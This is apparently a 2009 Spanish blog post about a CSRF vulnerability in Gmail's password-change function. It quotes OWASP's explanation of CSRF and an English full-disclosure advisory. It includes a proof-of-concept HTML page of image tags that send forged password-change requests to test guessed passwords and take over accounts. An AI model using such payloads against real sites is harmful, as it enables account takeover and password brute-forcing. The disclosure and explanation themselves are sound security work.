Skip to content

Vulnerabilidad CSRF en Gmail

marzo 5, 2009

gmail-logo1Estaba navegando un rato y me topé con información sobre una vulnerabilidad del tipo CSRF en el servicio de Gmail. Lo primero que se me vino a la mente fue un ¿que tan grave es esto? y mi conclusión viene siendo: “realmente no lo es tanto”. Pero bueno, primero les pongo un poco de información sobre las CSRF (Cross Site Request Forgery) sacado de la página de OWASP :

Las vulnerabilidades de falsificación de petición en sitios cruzados no son un ataque nuevo, pero son simples y devastadores. Un ataque CSRF fuerza el navegador validado de una víctima a enviar una petición a una aplicación Web vulnerable, la cual entonces realiza la acción elegida a través de la víctima.

Esta vulnerabilidad está extremadamente extendida, ya que cualquier aplicación que:

  • No dispone de pruebas de autorización para acciones vulnerables.
  • Procesará una acción si se pueden pasar credenciales predefinidas en la petición (por ejemplo. http://www.example.com/admin/doSomething.ctl?username=admin&passwd=admin).
  • Peticiones autorizadas basadas únicamente en credenciales que son automáticamente presentadas como la cookie de sesión si está actualmente conectado en la aplicación, o con la funcionalidad “Recuérdame” si no lo está, o un testigo de Kerberos si forma parte de una intranet integrada con una autenticación con Active Directory está en riesgo. Desgraciadamente, hoy, la mayoría de las aplicaciones Web confían únicamente en las credenciales presentadas automáticamente tales como cookies de sesión, credenciales de autenticación básica, dirección IP de origen, certificados SSL, o credenciales de dominio Windows.

Esta vulnerabilidad es también conocida por otros nombres en inglés como Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking y Automation Attack. El acrónimo XSRF es también usado frecuentemente.

Ok, ahora hablemos un poco sobre la vulnerabilidad en Gmail. La vulnerabilidad radica en la función de “Change Password”, que viene siendo mas o menos aqui: https://www.google.com/accounts/EditPasswd?hl=es&service=mail .

The only token for authenticate the user is a session
cookie, and this cookie is sent automatically by the browser in every
request.

An attacker can create a page that includes requests to the “Change
password” functionality of GMail and modify the passwords of the users
who, being authenticated, visit the page of the attacker.

The attack is facilitated since the “Change Password” request can be
realized across the HTTP GET method instead of the POST method that is
realized habitually across the “Change Password” form.

Forma de ataque y código propuesto

Creamos una página .html con el siguiente código en el cuerpo:

<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">

The attacker can use deliberately a weak new password (see “Passwd”
and “PasswdAgain” parameters), this way he can know if the analysed
password is correct without need to modify the password of the victim
user.

Impacto y Solución

– DoS en usuarios de Gmail

– Acceso a cuentas de usuarios de Gmail

Solución = Gmail no ha propuesto nada al parecer

Fuentes:

Sobre CSRF: http://www.owasp.org/index.php/Top_10_2007-Vulnerabilidades_de_Falsificaci%C3%B3n_de_Petici%C3%B3n_en_Sitios_Cruzados_(CSRF)

Más información sobre la vulnerabilidad en: http://seclists.org/fulldisclosure/2009/Mar/0029.html

No comments yet

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: